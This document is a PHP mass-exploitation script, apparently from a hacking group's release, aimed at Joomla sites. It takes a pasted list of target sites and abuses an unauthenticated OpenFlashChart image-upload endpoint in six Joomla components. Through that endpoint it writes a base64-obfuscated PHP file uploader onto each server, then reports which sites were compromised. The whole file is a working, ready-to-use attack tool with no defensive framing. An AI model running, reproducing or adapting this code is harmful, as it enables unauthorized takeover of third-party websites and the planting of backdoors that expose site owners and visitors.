<form method='POST'>
<input type='text' name='name' value='sec4ever.php'>
<input type='submit' value='Exploit' name='exploit'><br>
<textarea name='sites' cols='45' rows='15'>Here Sites ;)</textarea>
</form>
<?
	/*
	# Coded By : xSecurity
	# Homepage : sec4ever.com - is-sec.com
	# GreetsTo : b0x - Mr.Dm4r - Lov3rDNS - RAB3OUN - r0kin - Shark Hidden - DeeF - DamaneDz - b0y h4ck - All Sec4ever Member'z
	# Scanning : [ com_civicrm , com_acymailing , com_jnewsletter , com_jinc , com_maianmedia , com_jnews ]
	*/
	@set_time_limit(0);
	$site = explode("\r\n", $_POST['sites']);
	$filename = $_POST['name'];
	$path = array('/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnewsletter/includes/openflashchart/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jinc/classes/graphics/php-ofc-library/ofc_upload_image.php','/administrator/components/com_maianmedia/utilities/charts/php-ofc-library/ofc_upload_image.php','/administrator/components/com_jnews/includes/openflashchart/php-ofc-library/ofc_upload_image.php');
	
	$name = array("/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/tmp-upload-images/","/administrator/components/com_acymailing/inc/openflash/tmp-upload-images/","/administrator/components/com_jnewsletter/includes/openflashchart/tmp-upload-images/","/administrator/components/com_jinc/classes/graphics/tmp-upload-images/","/administrator/components/com_maianmedia/utilities/charts/tmp-upload-images/","/administrator/components/com_jnews/includes/openflashchart/tmp-upload-images/");
	
	$uploader = base64_decode("PD9waHAKZWNobyAnPHRpdGxlPlVwbG9hZCBGaWxlcyB4U2VjdXJpdHkgfCBTZWM0ZXZlci5Db008L3RpdGxlPic7CmVjaG8gJzxmb3JtIGFjdGlvbj0iIiBtZXRob2Q9InBvc3QiIGVuY3R5cGU9Im11
bHRpcGFydC9mb3JtLWRhdGEiIG5hbWU9InVwbG9hZGVyIiBpZD0idXBsb2FkZXIiPic7CmVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOwppZiggJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIgKSB7CglpZihAY29weSgkX0ZJTEVTWydmaWxlJ11bJ3RtcF9uYW1lJ10sICRfRklMRVNbJ2ZpbGUnXVsnbmFtZSddKSkgeyBlY2hvICc8Yj5VcGxvYWQgQ29tcGxhdGUgISEhPC9iPjxicj48YnI+JzsgfQoJZWxzZSB7IGVjaG8gJzxiPlVwbG9hZCBGYWlsZWQgISEhPC9iPjxicj48YnI+JzsgfQp9Cj8+");
	
	$options = array('http' => array('method'=> "POST",'header'=> "Content-type: text/plain\r\n", 'content'=> $uploader));
	$context = stream_context_create($options);
	
	if($_POST['exploit'])
	{
		foreach($site as $sites)
		{
			foreach($path as $upload)
			{
				$fopen = @fopen("{$sites}{$upload}?name={$filename}", 'r', false, $context);
			}
			foreach($name as $names)
			{
				$url = "{$sites}{$names}{$filename}";
				$check = @file_get_contents($url);
				if(eregi("Sec4ever.CoM", $check))
				{
					echo "<font face='Tahoma' size='2'>[+] Exploit Complete => {$sites}/{$names}/{$filename} <br />";
					flush();
				}
			}
		}
	}
	echo "<font face='Tahoma' size='2'>[+] Coded By xSecurity => Sec4ever.CoM - is-sec.com <br> 4U : b0x - Mr.Dm4r - Lov3rDNS - RAB3OUN - r0kin - Shark Hidden - DeeF - DamaneDz - b0y h4ck - All Sec4ever Member'z</font>";
?>